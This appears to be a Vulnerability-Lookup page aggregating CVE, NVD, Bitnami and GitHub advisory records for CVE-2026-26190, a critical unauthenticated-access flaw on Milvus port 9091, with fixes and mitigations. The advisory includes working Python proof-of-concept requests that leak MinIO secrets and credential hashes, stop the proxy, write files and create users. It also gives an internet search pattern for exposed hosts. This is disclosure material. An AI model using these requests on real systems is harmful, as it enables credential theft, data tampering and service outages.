Vulnerability-Lookup

CVE-2026-26190 (GCVE-0-2026-26190)

Vulnerability from cvelistv5 – Published: 2026-02-13 18:44 – Updated: 2026-02-26 14:44

Title

Milvus Allows Unauthenticated Access to Restful API on Metrics Port (9091) Leads to Critical System Compromise

Summary

Milvus is an open-source vector database built for generative AI applications. Prior to 2.5.27 and 2.6.10, Milvus exposes TCP port 9091 by default, which enables authentication bypasses. The /expr debug endpoint uses a weak, predictable default authentication token derived from etcd.rootPath (default: by-dev), enabling arbitrary expression evaluation. The full REST API (/api/v1/*) is registered on the metrics/management port without any authentication, allowing unauthenticated access to all business operations including data manipulation and credential management. This vulnerability is fixed in 2.5.27 and 2.6.10.

Severity

9.8 (Critical)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

SSVC

Exploitation: poc Automatable: yes Technical Impact: total

CISA Coordinator (v2.0.3)

CWE

CWE-306 - Missing Authentication for Critical Function

Assigner

GitHub_M

References

4 references

URL	Tags
https://github.com/milvus-io/milvus/security/advi…	x_refsource_CONFIRM
https://github.com/milvus-io/milvus/commit/92b74d…	x_refsource_MISC
https://github.com/milvus-io/milvus/releases/tag/…	x_refsource_MISC
https://github.com/milvus-io/milvus/releases/tag/…	x_refsource_MISC

Impacted products

1 product

Vendor	Product	Version
milvus-io	milvus	Affected: < 2.5.27 Affected: >= 2.6.0, < 2.6.10

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-26190",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "yes"
                  },
                  {
                    "Technical Impact": "total"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-02-18T04:56:24.717605Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-02-26T14:44:20.414Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "milvus",
          "vendor": "milvus-io",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 2.5.27"
            },
            {
              "status": "affected",
              "version": "\u003e= 2.6.0, \u003c 2.6.10"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "Milvus is an open-source vector database built for generative AI applications. Prior to 2.5.27 and 2.6.10, Milvus exposes TCP port 9091 by default, which enables authentication bypasses. The /expr debug endpoint uses a weak, predictable default authentication token derived from etcd.rootPath (default: by-dev), enabling arbitrary expression evaluation. The full REST API (/api/v1/*) is registered on the metrics/management port without any authentication, allowing unauthenticated access to all business operations including data manipulation and credential management. This vulnerability is fixed in 2.5.27 and 2.6.10."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 9.8,
            "baseSeverity": "CRITICAL",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-306",
              "description": "CWE-306: Missing Authentication for Critical Function",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-02-13T18:44:33.465Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/milvus-io/milvus/security/advisories/GHSA-7ppg-37fh-vcr6",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/milvus-io/milvus/security/advisories/GHSA-7ppg-37fh-vcr6"
        },
        {
          "name": "https://github.com/milvus-io/milvus/commit/92b74dd2e286006a83b4a5f07951027b32e718a9",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/milvus-io/milvus/commit/92b74dd2e286006a83b4a5f07951027b32e718a9"
        },
        {
          "name": "https://github.com/milvus-io/milvus/releases/tag/v2.5.27",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/milvus-io/milvus/releases/tag/v2.5.27"
        },
        {
          "name": "https://github.com/milvus-io/milvus/releases/tag/v2.6.10",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/milvus-io/milvus/releases/tag/v2.6.10"
        }
      ],
      "source": {
        "advisory": "GHSA-7ppg-37fh-vcr6",
        "discovery": "UNKNOWN"
      },
      "title": "Milvus Allows Unauthenticated Access to Restful API on Metrics Port (9091) Leads to Critical System Compromise"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-26190",
    "datePublished": "2026-02-13T18:44:33.465Z",
    "dateReserved": "2026-02-11T19:56:24.812Z",
    "dateUpdated": "2026-02-26T14:44:20.414Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "epss": {
      "cve": "CVE-2026-26190",
      "date": "2026-06-10",
      "epss": "0.15051",
      "percentile": "0.94728"
    },
    "nvd": "{\"cve\":{\"id\":\"CVE-2026-26190\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-02-13T19:17:29.253\",\"lastModified\":\"2026-02-18T19:11:12.333\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Milvus is an open-source vector database built for generative AI applications. Prior to 2.5.27 and 2.6.10, Milvus exposes TCP port 9091 by default, which enables authentication bypasses. The /expr debug endpoint uses a weak, predictable default authentication token derived from etcd.rootPath (default: by-dev), enabling arbitrary expression evaluation. The full REST API (/api/v1/*) is registered on the metrics/management port without any authentication, allowing unauthenticated access to all business operations including data manipulation and credential management. This vulnerability is fixed in 2.5.27 and 2.6.10.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\",\"baseScore\":9.8,\"baseSeverity\":\"CRITICAL\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":3.9,\"impactScore\":5.9}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-306\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:milvus:milvus:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"2.5.27\",\"matchCriteriaId\":\"47F8F103-3983-4099-A154-D8F4A04A1EA5\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:milvus:milvus:*:*:*:*:*:*:*:*\",\"versionStartIncluding\":\"2.6.0\",\"versionEndExcluding\":\"2.6.10\",\"matchCriteriaId\":\"34DA261B-809B-41E7-A1AA-486B04758216\"}]}]}],\"references\":[{\"url\":\"https://github.com/milvus-io/milvus/commit/92b74dd2e286006a83b4a5f07951027b32e718a9\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/milvus-io/milvus/releases/tag/v2.5.27\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Product\",\"Release Notes\"]},{\"url\":\"https://github.com/milvus-io/milvus/releases/tag/v2.6.10\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Product\",\"Release Notes\"]},{\"url\":\"https://github.com/milvus-io/milvus/security/advisories/GHSA-7ppg-37fh-vcr6\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Mitigation\",\"Vendor Advisory\"]}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-26190\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"yes\"}, {\"Technical Impact\": \"total\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-02-18T04:56:24.717605Z\"}}}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-02-13T19:37:23.724Z\"}}], \"cna\": {\"title\": \"Milvus Allows Unauthenticated Access to Restful API on Metrics Port (9091) Leads to Critical System Compromise\", \"source\": {\"advisory\": \"GHSA-7ppg-37fh-vcr6\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 9.8, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"CRITICAL\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\", \"integrityImpact\": \"HIGH\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"HIGH\", \"privilegesRequired\": \"NONE\", \"confidentialityImpact\": \"HIGH\"}}], \"affected\": [{\"vendor\": \"milvus-io\", \"product\": \"milvus\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 2.5.27\"}, {\"status\": \"affected\", \"version\": \"\u003e= 2.6.0, \u003c 2.6.10\"}]}], \"references\": [{\"url\": \"https://github.com/milvus-io/milvus/security/advisories/GHSA-7ppg-37fh-vcr6\", \"name\": \"https://github.com/milvus-io/milvus/security/advisories/GHSA-7ppg-37fh-vcr6\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/milvus-io/milvus/commit/92b74dd2e286006a83b4a5f07951027b32e718a9\", \"name\": \"https://github.com/milvus-io/milvus/commit/92b74dd2e286006a83b4a5f07951027b32e718a9\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/milvus-io/milvus/releases/tag/v2.5.27\", \"name\": \"https://github.com/milvus-io/milvus/releases/tag/v2.5.27\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/milvus-io/milvus/releases/tag/v2.6.10\", \"name\": \"https://github.com/milvus-io/milvus/releases/tag/v2.6.10\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"Milvus is an open-source vector database built for generative AI applications. Prior to 2.5.27 and 2.6.10, Milvus exposes TCP port 9091 by default, which enables authentication bypasses. The /expr debug endpoint uses a weak, predictable default authentication token derived from etcd.rootPath (default: by-dev), enabling arbitrary expression evaluation. The full REST API (/api/v1/*) is registered on the metrics/management port without any authentication, allowing unauthenticated access to all business operations including data manipulation and credential management. This vulnerability is fixed in 2.5.27 and 2.6.10.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-306\", \"description\": \"CWE-306: Missing Authentication for Critical Function\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-02-13T18:44:33.465Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2026-26190\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-02-26T14:44:20.414Z\", \"dateReserved\": \"2026-02-11T19:56:24.812Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-02-13T18:44:33.465Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }
  }
}

bit-milvus-2026-26190

Vulnerability from bitnami_vulndb

Published

2026-02-19 08:47

Modified

2026-02-19 09:13

Summary

Milvus Allows Unauthenticated Access to Restful API on Metrics Port (9091) Leads to Critical System Compromise

Details

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "Bitnami",
        "name": "milvus",
        "purl": "pkg:bitnami/milvus"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2.5.27"
            },
            {
              "introduced": "2.6.0"
            },
            {
              "fixed": "2.6.10"
            }
          ],
          "type": "SEMVER"
        }
      ],
      "severity": [
        {
          "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
          "type": "CVSS_V3"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-26190"
  ],
  "database_specific": {
    "cpes": [
      "cpe:2.3:a:milvus:milvus:*:*:*:*:*:*:*:*"
    ],
    "severity": "Critical"
  },
  "details": "Milvus is an open-source vector database built for generative AI applications. Prior to 2.5.27 and 2.6.10, Milvus exposes TCP port 9091 by default, which enables authentication bypasses. The /expr debug endpoint uses a weak, predictable default authentication token derived from etcd.rootPath (default: by-dev), enabling arbitrary expression evaluation. The full REST API (/api/v1/*) is registered on the metrics/management port without any authentication, allowing unauthenticated access to all business operations including data manipulation and credential management. This vulnerability is fixed in 2.5.27 and 2.6.10.",
  "id": "BIT-milvus-2026-26190",
  "modified": "2026-02-19T09:13:37.164Z",
  "published": "2026-02-19T08:47:10.808Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/milvus-io/milvus/commit/92b74dd2e286006a83b4a5f07951027b32e718a9"
    },
    {
      "type": "WEB",
      "url": "https://github.com/milvus-io/milvus/releases/tag/v2.5.27"
    },
    {
      "type": "WEB",
      "url": "https://github.com/milvus-io/milvus/releases/tag/v2.6.10"
    },
    {
      "type": "WEB",
      "url": "https://github.com/milvus-io/milvus/security/advisories/GHSA-7ppg-37fh-vcr6"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26190"
    }
  ],
  "schema_version": "1.6.2",
  "summary": "Milvus Allows Unauthenticated Access to Restful API on Metrics Port (9091) Leads to Critical System Compromise"
}

FKIE_CVE-2026-26190

Vulnerability from fkie_nvd - Published: 2026-02-13 19:17 - Updated: 2026-02-18 19:11

Severity

9.8 (Critical) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Summary

References

URL	Tags
security-advisories@github.com	https://github.com/milvus-io/milvus/commit/92b74dd2e286006a83b4a5f07951027b32e718a9	Patch
security-advisories@github.com	https://github.com/milvus-io/milvus/releases/tag/v2.5.27	Product, Release Notes
security-advisories@github.com	https://github.com/milvus-io/milvus/releases/tag/v2.6.10	Product, Release Notes
security-advisories@github.com	https://github.com/milvus-io/milvus/security/advisories/GHSA-7ppg-37fh-vcr6	Exploit, Mitigation, Vendor Advisory

Impacted products

	Vendor	Product	Version
	milvus	milvus	*
	milvus	milvus	*

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:milvus:milvus:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "47F8F103-3983-4099-A154-D8F4A04A1EA5",
              "versionEndExcluding": "2.5.27",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:milvus:milvus:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "34DA261B-809B-41E7-A1AA-486B04758216",
              "versionEndExcluding": "2.6.10",
              "versionStartIncluding": "2.6.0",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Milvus is an open-source vector database built for generative AI applications. Prior to 2.5.27 and 2.6.10, Milvus exposes TCP port 9091 by default, which enables authentication bypasses. The /expr debug endpoint uses a weak, predictable default authentication token derived from etcd.rootPath (default: by-dev), enabling arbitrary expression evaluation. The full REST API (/api/v1/*) is registered on the metrics/management port without any authentication, allowing unauthenticated access to all business operations including data manipulation and credential management. This vulnerability is fixed in 2.5.27 and 2.6.10."
    },
    {
      "lang": "es",
      "value": "Milvus es una base de datos vectorial de c\u00f3digo abierto construida para aplicaciones de IA generativa. Antes de 2.5.27 y 2.6.10, Milvus expone el puerto TCP 9091 por defecto, lo que permite eludir la autenticaci\u00f3n. El endpoint de depuraci\u00f3n /expr utiliza un token de autenticaci\u00f3n predeterminado d\u00e9bil y predecible derivado de etcd.rootPath (por defecto: by-dev), lo que permite la evaluaci\u00f3n arbitraria de expresiones. La API REST completa (/api/v1/*) est\u00e1 registrada en el puerto de m\u00e9tricas/gesti\u00f3n sin ninguna autenticaci\u00f3n, lo que permite el acceso no autenticado a todas las operaciones comerciales, incluida la manipulaci\u00f3n de datos y la gesti\u00f3n de credenciales. Esta vulnerabilidad se corrige en 2.5.27 y 2.6.10."
    }
  ],
  "id": "CVE-2026-26190",
  "lastModified": "2026-02-18T19:11:12.333",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 9.8,
          "baseSeverity": "CRITICAL",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 5.9,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2026-02-13T19:17:29.253",
  "references": [
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Patch"
      ],
      "url": "https://github.com/milvus-io/milvus/commit/92b74dd2e286006a83b4a5f07951027b32e718a9"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Product",
        "Release Notes"
      ],
      "url": "https://github.com/milvus-io/milvus/releases/tag/v2.5.27"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Product",
        "Release Notes"
      ],
      "url": "https://github.com/milvus-io/milvus/releases/tag/v2.6.10"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Exploit",
        "Mitigation",
        "Vendor Advisory"
      ],
      "url": "https://github.com/milvus-io/milvus/security/advisories/GHSA-7ppg-37fh-vcr6"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Analyzed",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-306"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Primary"
    }
  ]
}

GHSA-7PPG-37FH-VCR6

Vulnerability from github – Published: 2026-02-11 19:49 – Updated: 2026-02-13 17:17

Summary

Milvus: Unauthenticated Access to Restful API on Metrics Port (9091) Leads to Critical System Compromise

Details

Summary

Milvus exposes TCP port 9091 by default with two critical authentication bypass vulnerabilities:

The /expr debug endpoint uses a weak, predictable default authentication token derived from etcd.rootPath (default: by-dev), enabling arbitrary expression evaluation.
The full REST API (/api/v1/*) is registered on the metrics/management port without any authentication, allowing unauthenticated access to all business operations including data manipulation and credential management.

Details

Vulnerability 1: Weak Default Authentication on `/expr` Endpoint

The /expr endpoint on port 9091 accepts an auth parameter that defaults to the etcd.rootPath value (by-dev). This value is well-known and predictable. An attacker who can reach port 9091 can evaluate arbitrary internal Go expressions, leading to:

Information/Credential Disclosure: Reading internal configuration values (MinIO secrets, etcd credentials) and user credential hashes via param.MinioCfg.SecretAccessKey.GetValue(), rootcoord.meta.GetCredential(ctx, 'root'), etc.
Denial of Service: Invoking proxy.Stop() to shut down the proxy service.
Arbitrary File Write (potential RCE): Manipulating access log configuration parameters to write arbitrary content to arbitrary file paths on the server filesystem.

Vulnerability 2: Unauthenticated REST API on Metrics Port

Business-logic HTTP handlers (collection management, data insertion, credential management) are registered on the metrics/management HTTP server at port 9091 via registerHTTPServer() in internal/distributed/proxy/service.go (line 170). These endpoints do not enforce any authentication, even when Milvus authentication is enabled on the primary gRPC/HTTP ports.

An attacker can perform any business operation without credentials, including:

Creating, listing, and deleting collections
Inserting and querying data
Creating, listing, and deleting user credentials
Modifying user passwords

Proof of Concept

PoC 1 — `/expr` Endpoint Exploitation

import requests

url = "http://<target>:9091/expr"

# Leak sensitive configuration (e.g., MinIO secret key)
res = requests.get(url, params={
    "auth": "by-dev",
    "code": "param.MinioCfg.SecretAccessKey.GetValue()"
}, timeout=5)
print(res.json().get("output", ""))

# Retrieve hashed credentials for the root user
res = requests.get(url, params={
    "auth": "by-dev",
    "code": "rootcoord.meta.GetCredential(ctx, 'root')"
}, timeout=5)
print(res.json().get("output", ""))

# Denial of Service — stop the proxy
res = requests.get(url, params={
    "auth": "by-dev",
    "code": "proxy.Stop()"
}, timeout=5)

# Arbitrary file write (potential RCE)
for cmd in [
    'param.Save("proxy.accessLog.localPath", "/tmp")',
    'param.Save("proxy.accessLog.formatters.base.format", "whoami")',
    'param.Save("proxy.accessLog.filename", "evil.sh")',
    'querycoord.etcdCli.KV.Put(ctx, "by-dev/config/proxy/accessLog/enable", "true")'
]:
    requests.get(url, params={"auth": "by-dev", "code": cmd}, timeout=5)

PoC 2 — Unauthenticated REST API Access

import requests

target_url = "http://<target>:9091"

# Create a user without any authentication
res = requests.post(f"{target_url}/api/v1/credential", json={
    "username": "attacker_user",
    "password": "MTIzNDU2Nzg5",
})
print(res.json())

# List all users
res = requests.get(f"{target_url}/api/v1/credential/users")
print(res.json())  # {'status': {}, 'usernames': ['root', 'attacker_user']}

# Create and delete collections, insert data — all without authentication

Internet Exposure

A significant number of publicly exposed Milvus instances are discoverable via internet-wide scanning using the pattern:

http.body="404 page not found" && port="9091"

This indicates the vulnerability is actively exploitable in real-world production environments.

Impact

An unauthenticated remote attacker with network access to port 9091 can:

Exfiltrate secrets and credentials — MinIO keys, etcd credentials, user password hashes, and all internal configuration values.
Manipulate all data — Create, modify, and delete collections, insert or remove data, bypassing all application-level access controls.
Manage user accounts — Create administrative users, reset passwords, and escalate privileges.
Cause denial of service — Shut down proxy services, drop databases, or corrupt metadata.
Write arbitrary files — Potentially achieve remote code execution by writing malicious files to the filesystem via access log configuration manipulation.

Remediation

Recommended Fixes

Remove or disable the /expr endpoint in production builds. If retained for debugging, it must require strong, non-default authentication and be disabled by default.
Do not register business API routes on the metrics port. Separate the metrics/health endpoints from the application REST API to ensure authentication middleware applies consistently.
Bind port 9091 to localhost by default (127.0.0.1:9091) so it is not externally accessible unless explicitly configured.
Enforce authentication on all API endpoints, regardless of which port they are served on.

User Mitigations (until patched)

Block external access to port 9091 using firewall rules or network policies.
If running in Docker/Kubernetes, do not expose port 9091 outside the internal network.
Change the etcd.rootPath from the default value by-dev to a strong, random value (partial mitigation only — does not address the unauthenticated REST API).

Credit

This vulnerability was discovered and responsibly reported by YingLin Xie (xieyinglin@hust.edu.cn). It was independently reported by 0x1f and zznQ (ac0d3r).

Severity

9.8 (Critical)


                  
                    CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/milvus-io/milvus"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2.5.27"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/milvus-io/milvus"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "2.6.0"
            },
            {
              "fixed": "2.6.10"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-26190"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1188",
      "CWE-306",
      "CWE-749"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-02-11T19:49:44Z",
    "nvd_published_at": null,
    "severity": "CRITICAL"
  },
  "details": "## Summary\n\nMilvus exposes TCP port 9091 by default with two critical authentication bypass vulnerabilities:\n\n1. The `/expr` debug endpoint uses a weak, predictable default authentication token derived from `etcd.rootPath` (default: `by-dev`), enabling arbitrary expression evaluation.\n2. The full REST API (`/api/v1/*`) is registered on the metrics/management port without any authentication, allowing unauthenticated access to all business operations including data manipulation and credential management.\n\n## Details\n\n### Vulnerability 1: Weak Default Authentication on `/expr` Endpoint\n\nThe `/expr` endpoint on port 9091 accepts an `auth` parameter that defaults to the `etcd.rootPath` value (`by-dev`). This value is well-known and predictable. An attacker who can reach port 9091 can evaluate arbitrary internal Go expressions, leading to:\n\n- **Information/Credential Disclosure**: Reading internal configuration values (MinIO secrets, etcd credentials) and user credential hashes via `param.MinioCfg.SecretAccessKey.GetValue()`, `rootcoord.meta.GetCredential(ctx, \u0027root\u0027)`, etc.\n- **Denial of Service**: Invoking `proxy.Stop()` to shut down the proxy service.\n- **Arbitrary File Write (potential RCE)**: Manipulating access log configuration parameters to write arbitrary content to arbitrary file paths on the server filesystem.\n\n### Vulnerability 2: Unauthenticated REST API on Metrics Port\n\nBusiness-logic HTTP handlers (collection management, data insertion, credential management) are registered on the metrics/management HTTP server at port 9091 via `registerHTTPServer()` in [`internal/distributed/proxy/service.go` (line 170)](https://github.com/milvus-io/milvus/blob/9996e8d1cebff7e7108bcb16d43124236de77438/internal/distributed/proxy/service.go#L170). These endpoints do not enforce any authentication, even when Milvus authentication is enabled on the primary gRPC/HTTP ports.\n\nAn attacker can perform any business operation without credentials, including:\n\n- Creating, listing, and deleting collections\n- Inserting and querying data\n- Creating, listing, and deleting user credentials\n- Modifying user passwords\n\n## Proof of Concept\n\n### PoC 1 \u2014 `/expr` Endpoint Exploitation\n\n```python\nimport requests\n\nurl = \"http://\u003ctarget\u003e:9091/expr\"\n\n# Leak sensitive configuration (e.g., MinIO secret key)\nres = requests.get(url, params={\n    \"auth\": \"by-dev\",\n    \"code\": \"param.MinioCfg.SecretAccessKey.GetValue()\"\n}, timeout=5)\nprint(res.json().get(\"output\", \"\"))\n\n# Retrieve hashed credentials for the root user\nres = requests.get(url, params={\n    \"auth\": \"by-dev\",\n    \"code\": \"rootcoord.meta.GetCredential(ctx, \u0027root\u0027)\"\n}, timeout=5)\nprint(res.json().get(\"output\", \"\"))\n\n# Denial of Service \u2014 stop the proxy\nres = requests.get(url, params={\n    \"auth\": \"by-dev\",\n    \"code\": \"proxy.Stop()\"\n}, timeout=5)\n\n# Arbitrary file write (potential RCE)\nfor cmd in [\n    \u0027param.Save(\"proxy.accessLog.localPath\", \"/tmp\")\u0027,\n    \u0027param.Save(\"proxy.accessLog.formatters.base.format\", \"whoami\")\u0027,\n    \u0027param.Save(\"proxy.accessLog.filename\", \"evil.sh\")\u0027,\n    \u0027querycoord.etcdCli.KV.Put(ctx, \"by-dev/config/proxy/accessLog/enable\", \"true\")\u0027\n]:\n    requests.get(url, params={\"auth\": \"by-dev\", \"code\": cmd}, timeout=5)\n```\n\n### PoC 2 \u2014 Unauthenticated REST API Access\n\n```python\nimport requests\n\ntarget_url = \"http://\u003ctarget\u003e:9091\"\n\n# Create a user without any authentication\nres = requests.post(f\"{target_url}/api/v1/credential\", json={\n    \"username\": \"attacker_user\",\n    \"password\": \"MTIzNDU2Nzg5\",\n})\nprint(res.json())\n\n# List all users\nres = requests.get(f\"{target_url}/api/v1/credential/users\")\nprint(res.json())  # {\u0027status\u0027: {}, \u0027usernames\u0027: [\u0027root\u0027, \u0027attacker_user\u0027]}\n\n# Create and delete collections, insert data \u2014 all without authentication\n```\n\n## Internet Exposure\n\nA significant number of publicly exposed Milvus instances are discoverable via internet-wide scanning using the pattern:\n\n```\nhttp.body=\"404 page not found\" \u0026\u0026 port=\"9091\"\n```\n\nThis indicates the vulnerability is actively exploitable in real-world production environments.\n\n## Impact\n\nAn unauthenticated remote attacker with network access to port 9091 can:\n\n1. **Exfiltrate secrets and credentials** \u2014 MinIO keys, etcd credentials, user password hashes, and all internal configuration values.\n2. **Manipulate all data** \u2014 Create, modify, and delete collections, insert or remove data, bypassing all application-level access controls.\n3. **Manage user accounts** \u2014 Create administrative users, reset passwords, and escalate privileges.\n4. **Cause denial of service** \u2014 Shut down proxy services, drop databases, or corrupt metadata.\n5. **Write arbitrary files** \u2014 Potentially achieve remote code execution by writing malicious files to the filesystem via access log configuration manipulation.\n\n## Remediation\n\n### Recommended Fixes\n\n1. **Remove or disable the `/expr` endpoint** in production builds. If retained for debugging, it must require strong, non-default authentication and be disabled by default.\n2. **Do not register business API routes on the metrics port.** Separate the metrics/health endpoints from the application REST API to ensure authentication middleware applies consistently.\n3. **Bind port 9091 to localhost by default** (`127.0.0.1:9091`) so it is not externally accessible unless explicitly configured.\n4. **Enforce authentication on all API endpoints**, regardless of which port they are served on.\n\n### User Mitigations (until patched)\n\n- Block external access to port 9091 using firewall rules or network policies.\n- If running in Docker/Kubernetes, do not expose port 9091 outside the internal network.\n- Change the `etcd.rootPath` from the default value `by-dev` to a strong, random value (partial mitigation only \u2014 does not address the unauthenticated REST API).\n\n## Credit\n\nThis vulnerability was discovered and responsibly reported by **YingLin Xie** (xieyinglin@hust.edu.cn). It was independently reported by [0x1f](https://github.com/0x1f) and zznQ ([ac0d3r](https://github.com/ac0d3r)).",
  "id": "GHSA-7ppg-37fh-vcr6",
  "modified": "2026-02-13T17:17:11Z",
  "published": "2026-02-11T19:49:44Z",
